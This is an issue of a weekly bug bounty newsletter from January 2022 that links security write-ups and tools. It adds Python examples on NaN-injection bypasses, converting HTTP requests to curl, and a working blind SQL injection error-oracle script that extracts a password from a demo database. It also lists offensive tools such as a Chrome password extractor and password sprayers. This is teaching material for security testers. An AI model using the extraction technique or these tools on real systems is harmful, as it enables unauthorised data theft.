By Anna Hammond
January 26, 2022
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from January 17 to 24, 2022.
New responsible disclosure program
European Commission’s Open Source Programme Office starts bug bounties
Python NaN Injection, Repo & Decipher Podcast: Robert Hansen Returns
It is strange that this new Python vulnerability class went unnoticed for so long. The gist: Python's float() accepts the strings "nan" and "inf" (and json.loads accepts the bare literals NaN and Infinity by default), and every comparison against NaN evaluates to False, so a range check such as "reject if amount < 0 or amount > balance" lets a NaN through without either bound firing. It may be complex and difficult to identify, but it is also novel and an interesting area to explore.
As an aside, Robert Hansen / @RSnake is one of the first hackers I followed when I started in 2012. Among other things, he created the old ha.ckers.org XSS Cheat Sheet on which the OWASP XSS Filter Evasion Cheat Sheet was based.
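A worked example of the NaN problem, added here and not taken from the linked article: a hypothetical withdraw() check that NaN bypasses, the same check hardened with math.isfinite, and a json.loads wrapper that refuses the NaN/Infinity literals the default decoder accepts. Function and field names (withdraw_*, parse_amount_json, "amount", BALANCE) are assumptions for illustration.

```python
"""NaN injection in Python input validation (added example, hypothetical code)."""
import json
import math

BALANCE = 100.0  # assumed account balance for the demo


def withdraw_vulnerable(raw_amount: str) -> bool:
    """Return True if the withdrawal is accepted.

    Intended rule: 0 < amount <= BALANCE. Every comparison with NaN is False,
    so for "nan" neither half of the guard fires and the request is accepted.
    """
    amount = float(raw_amount)            # float("nan"), float("inf") both parse
    if amount <= 0 or amount > BALANCE:   # NaN <= 0 -> False, NaN > BALANCE -> False
        return False
    return True


def withdraw_hardened(raw_amount: str) -> bool:
    """Same rule, but rejects unparsable and non-finite values before comparing."""
    try:
        amount = float(raw_amount)
    except ValueError:
        return False
    if not math.isfinite(amount):         # catches nan, inf and -inf
        return False
    if amount <= 0 or amount > BALANCE:
        return False
    return True


def _reject_constant(name: str):
    # json.loads accepts the non-standard literals NaN, Infinity and -Infinity
    # by default; parse_constant is called for exactly those, so raising here
    # turns them into a decode failure.
    raise ValueError(f"non-finite JSON number {name!r} rejected")


def parse_amount_json(body: str) -> float:
    """Parse {"amount": ...} from a JSON body, refusing NaN/Infinity literals."""
    data = json.loads(body, parse_constant=_reject_constant)
    amount = float(data["amount"])
    if not math.isfinite(amount):         # belt and braces for e.g. 1e999
        raise ValueError("non-finite amount")
    return amount


def json_amount_is_nan_by_default(body: str) -> bool:
    """Show that a plain json.loads happily yields a NaN float."""
    return math.isnan(json.loads(body)["amount"])


if __name__ == "__main__":
    for value in ("50", "500", "-1", "nan", "NaN", "inf"):
        print(f"{value!r:>6}: vulnerable={withdraw_vulnerable(value)} "
              f"hardened={withdraw_hardened(value)}")
```

Note that int() rejects "nan", so this only bites code paths that parse floats or decimals, or that accept JSON numbers and compare them without a finiteness check.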
Hacking the Apple Webcam (again) (Apple, $100,500)
CVE-2021-45467: CWP CentOS Web Panel – preauth RCE
The Tale of a Click leading to RCE
Ryan Pickren discovered a UXSS and other issues in Safari that, chained together, could give an attacker access to the victim’s camera and to any website they had visited, bypassing Gatekeeper.
@0xLupin’s writeup is an amazing red teaming story that demonstrates how SSRF can be upgraded to RCE in a real-world (but CTF-like) scenario.
The third writeup is about a curious RCE via local file write on CentOS Web Panel.
In @PaulosYibelo’s words, ".%00./ is the new ..;/".
Creating easy proof-of-concept scripts with Python and Curl.
Debugging a Java application with decompiled source code
The first tutorial shows how to use curl.se/h2c/ and curl.trillworks.com to easily convert HTTP requests (e.g. copied from Burp) to curl commands, and curl commands to Python or other languages (PHP, JavaScript, Go, Rust, JSON and many others).
It can be handy if you are short on time or struggle with creating custom scripts/curl commands.
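As an added example of the conversion the tutorial describes (this is not the code behind curl.se/h2c or curl.trillworks.com), here is a small parser that takes an HTTP/1.x request as pasted out of Burp and emits an equivalent curl command and the keyword arguments for a requests.request() call. The sample request, host name and cookie value are constructed for illustration.

```python
"""Raw HTTP request -> curl command / requests kwargs (added example)."""
import shlex
from dataclasses import dataclass, field

# Headers curl/requests generate themselves; copying them verbatim breaks the
# request (wrong Content-Length after you edit the body, stale Host, etc.).
SKIP_HEADERS = {"content-length", "host", "connection", "accept-encoding"}


@dataclass
class RawRequest:
    method: str
    path: str
    headers: list = field(default_factory=list)  # (name, value) pairs, order kept
    body: str = ""

    @property
    def host(self) -> str:
        for name, value in self.headers:
            if name.lower() == "host":
                return value
        raise ValueError("request has no Host header")


def parse_raw_request(text: str) -> RawRequest:
    """Parse a request as copied from a proxy; CRLF and LF line endings both work."""
    text = text.replace("\r\n", "\n")
    head, _, body = text.partition("\n\n")
    lines = head.strip().split("\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or not request_line[2].startswith("HTTP/"):
        raise ValueError(f"bad request line: {lines[0]!r}")
    method, path, _version = request_line
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")  # split on the first colon only
        if not sep:
            raise ValueError(f"bad header line: {line!r}")
        headers.append((name.strip(), value.strip()))
    return RawRequest(method.upper(), path, headers, body)


def to_curl(req: RawRequest, scheme: str = "https") -> str:
    """Build a shell-safe curl command line; -i keeps the response headers visible."""
    parts = ["curl", "-i", "-X", req.method, shlex.quote(f"{scheme}://{req.host}{req.path}")]
    for name, value in req.headers:
        if name.lower() in SKIP_HEADERS:
            continue
        parts += ["-H", shlex.quote(f"{name}: {value}")]
    if req.body:
        parts += ["--data-raw", shlex.quote(req.body)]  # sent as-is, no @file expansion
    return " ".join(parts)


def to_requests_kwargs(req: RawRequest, scheme: str = "https") -> dict:
    """The Python side of the conversion: arguments for requests.request(**kwargs)."""
    headers = {n: v for n, v in req.headers if n.lower() not in SKIP_HEADERS}
    kwargs = {"method": req.method, "url": f"{scheme}://{req.host}{req.path}", "headers": headers}
    if req.body:
        kwargs["data"] = req.body
    return kwargs


# Constructed sample, as it would look copied out of Burp Repeater (assumed host/cookie).
SAMPLE = (
    "POST /api/v1/login HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 26\r\n"
    "Cookie: session=abc123\r\n"
    "\r\n"
    "username=admin&password=x'"
)

if __name__ == "__main__":
    req = parse_raw_request(SAMPLE)
    print(to_curl(req))
    print(to_requests_kwargs(req))
```

The body in the sample deliberately contains a single quote to show that shlex.quote handles the escaping for you; hand-built curl lines are where most "the PoC works in Burp but not in the script" problems come from.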
The second tutorial is about dynamic analysis of Java apps using IntelliJ IDEA. If you perform static analysis of Java apps and find it difficult to trace sinks and sources, this debugging method by @dozernz can make the process much easier.
Free SQL injection section of Bug Bounty – An Advanced Guide to Finding Good Bugs
@HusseiN98D gave an advanced bug bounty workshop at THREAT CON and published the recording on Udemy.
It is not free ($49.99 until the end of the week, then $139.99) but the SQL injection section is. It is more than one hour on SQL injection with a couple of advanced bug bounty use cases that may teach you some useful tricks.
Note that it is extremely rare for me to feature paid content in this newsletter. The only reason I am making this exception is its quality and the juicy hour long free video it includes.
A tip for exploiting tricky blind SQL injections
If you find a blind SQL injection and have a hard time exfiltrating data, try @mcipekci’s technique (adapted to your context, of course) to force the app to return an error: once a condition you control decides whether the query errors, the error-or-no-error response becomes a one-bit oracle you can use to extract data.
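To make the error-oracle idea concrete, here is an added example (a generic conditional-error oracle, not @mcipekci’s exact payload) against a hypothetical SQLite-backed lookup built in-process. The vulnerable function, table layout and password value are constructed for the demo; the error trigger relies on SQLite raising "integer overflow" for abs() of the smallest 64-bit integer.

```python
"""Blind SQL injection -> conditional-error oracle (added example, SQLite)."""
import sqlite3

# Constructed target: one table, one row. In a real test this is the remote app.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users(username, password) VALUES ('admin', 's3cret!');
""")


def lookup_user_vulnerable(username: str) -> bool:
    """Hypothetical vulnerable endpoint: string-concatenated query, True if a row
    matches, False otherwise, and a raw database error (a 500 over HTTP) on failure."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchone() is not None


# abs() of the minimum int64 raises "integer overflow" in SQLite. The "+ 0*id"
# references a column so the call is not a constant expression that SQLite
# could pre-evaluate outside the CASE branch.
ERROR_IF_TRUE = "abs(-9223372036854775808 + 0*id)"


def oracle(condition: str) -> bool:
    """True if `condition` (SQL over the admin row) holds.

    The WHERE clause is otherwise always true for the admin row, so the normal
    response carries no information; only the error channel leaks the bit.
    """
    payload = f"admin' AND (CASE WHEN ({condition}) THEN {ERROR_IF_TRUE} ELSE 1 END)--"
    try:
        lookup_user_vulnerable(payload)
    except sqlite3.Error:
        return True
    return False


def extract_password(max_len: int = 32) -> str:
    """Dump admin's password one character at a time via the error oracle,
    binary-searching printable ASCII so each character costs ~7 requests."""
    out = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(password) >= {pos}"):
            break
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(password, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


if __name__ == "__main__":
    print("oracle(1=1):", oracle("1=1"), " oracle(1=2):", oracle("1=2"))
    print("admin password:", extract_password())
```

Against a real target the try/except around the query becomes "status 500 (or an error page) versus a normal response", and the error-raising expression changes per backend (for MySQL, for example, an invalid cast or EXTRACTVALUE is the usual trigger); the binary search over the character code stays the same.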
Finding security vulnerabilities with GitHub’s new code search
Web App Penetration Testing – Course Introduction & Introduction To HTTP
Injecting code into any Homebrew Cask by attacking GitHub Actions script
Demystifying JA3: One Handshake at a Time & Other ways a site can block Burp traffic
Vulnerable AWS Lambda function – Initial access in cloud attacks
A Beginner’s guide into Router Hacking and Firmware Emulation
Solarwinds Web Help Desk: When the Helpdesk is too Helpful #Web #CodeReview
Blind Server-Side Request Forgery & Unsafe Object Deserialization in Html2Pdf <= 5.2.3 #Web #CodeReview
Cisco Prime 3.9.1 – RCE #Web #SNMP
Paranoids’ Vulnerability Research: PrinterLogic Issues Security Alert #Printer
ZohOwned :: A Critical Authentication Bypass on Zoho ManageEngine Desktop Central (Zoho)
The Cat Escaped from the Chrome Sandbox #Browser #MemoryCorruption
Finding vulnerabilities in Swiss Post’s future e-voting system – Part 1 (Swiss Post)
CVE-2022-21661: Exposing Database Info Via WordPress SQL Injection (WordPress)
See more writeups on The list of bug bounty writeups.
ripgen: Rust-based high performance domain permutation generator
ShadowClone: Allows you to distribute your long running tasks dynamically across thousands of serverless functions
jo: JSON output from a shell
Chrome Bandit: Programmatically extract saved passwords from Google Chrome
TREVORproxy, TREVORspray 2.0 & Intro: Increasing the speed and effectiveness of password sprays
New InternetDB API by Shodan that lets you do fast IP lookups for free without an API key
HOUDINI: Hundreds of Offensive and Useful Docker Images for Network Intrusion
Captain Hook – How (Not) To Look For Vulnerabilities In Java Applications
The best free, open-source supply-chain security tool? The lockfile
SeeYouCM-Thief: Exploiting Common Misconfigurations In Cisco Phone Systems & SeeYouCM Thief
Bug bounty
Cybersecurity
Jobs
Upcoming events
IWCon 2022 (February 26-27)
Bounty Hunters Hackathon (Deadline is February 20)
HTB giveaway (January 24 to February 4)
Tool updates